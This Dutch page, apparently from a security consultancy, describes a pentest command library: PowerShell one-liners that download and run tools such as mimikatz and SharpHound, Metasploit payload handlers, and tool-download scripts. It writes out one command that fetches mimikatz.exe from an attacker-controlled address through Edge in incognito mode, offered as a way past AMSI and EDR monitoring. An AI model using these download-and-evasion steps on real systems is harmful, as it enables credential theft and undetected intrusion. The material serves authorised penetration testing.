Incompetent Basterd
Home / De Command Library / PowerShell Payloads, Metasploit & Tool Downloads

PowerShell Payloads, Metasploit & Tool Downloads

25. PowerShell Payloads, Metasploit & Tool Downloads

PowerShell Payloads ps...

De psmeth*, psmimikatz, pssharphound, psprintspoofer en aanverwante bestanden. Dit zijn kant-en-klare PowerShell one-liners die specifieke tools downloaden en uitvoeren. Selecteer, pas het IP aan, injecteer. Klaar. Geen nadenken nodig. Dat heb je al gedaan toen je koos welke tool je wilde draaien. De rest is automatisch.

Metasploit msf...

msf_tcp, msf_https, msf_https8080, msfshell_tcp, msfshell_tcp8080. Metasploit handler-configuraties en meterpreter/shell payloads. De standaard gereedschapskist. Het equivalent van een hamer en een schroevendraaier: niet spectaculair, altijd nodig, en als je ze niet hebt ben je nergens.

Tool Downloads get_

55 bestanden die stuk voor stuk een specifiek hulpmiddel downloaden naar de doelmachine. Van get_mimikatz tot get_winpeasx64, van get_rubeus tot get_pingcastle. Windows-tools gebruiken PowerShell WebClient om te downloaden naar c:\windows\tasks\. Linux-tools gebruiken curl met chmod +x.

Ze werken. Ze stellen geen vragen. Ze downloaden. Het is het minst ingewikkelde deel van deze hele operatie, en soms is eenvoud precies wat je nodig hebt na een uur lang Kerberos-tickets vervalsen.

Edge Downloads get_ie_

51 bestanden — dezelfde tools, maar dan via Microsoft Edge in incognito-modus. Voor als PowerShell geblokkeerd, gemonitord of door AMSI onderschept wordt. Het commando opent Edge en navigeert naar de download-URL:

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --incognito http://10.0.0.1/tools/mimikatz.exe

Edge is een door Microsoft ondertekende binary. Het downloaden van een bestand via een browser is een legitieme actie die geen bells doet rinkelen bij EDR-systemen die specifiek op PowerShell en certutil letten. Het is het verschil tussen door de voordeur lopen en door het raam klimmen: hetzelfde eindresultaat, maar de buren kijken niet op als je de voordeur gebruikt.

Tool Provisioning download_tools.sh

De tools zelf — mimikatz, Rubeus, SharpHound, winPEAS en de rest — worden niet meegeleverd in de repository. Binaries horen niet in Git, en GitHub flagged offensieve tools sneller dan je “het is voor een pentest” kunt typen. In plaats daarvan draai je na git clone:

bash download_tools.sh

Het script downloadt alles van officiële GitHub-releases en repositories: mimikatz van gentilkiwi, Rubeus en Certify via Flangvik’s SharpCollection, PEASS-ng voor winPEAS en linpeas, PrintSpoofer van itm4n, PsExec64 van Sysinternals, PowerView en PowerUp van PowerSploit, enzovoort. Tools die compilatie vereisen (SpoolSample, Outflank-Dumpert, NetLoader) krijgen een waarschuwing met de bron-URL. Lokale of commerciële tools (netscan.exe, custom scripts) worden overgeslagen als ze niet aanwezig zijn.

Op de hoogte blijven?

Ontvang maandelijks cybersecurity-inzichten in je inbox.

← De Command Library ← Home

Klaar voor de volgende stap?

Praat over je beveiliging.

Een vrijblijvend gesprek van 30 minuten — geen sales, alleen technische sparring.

Plan een gesprek →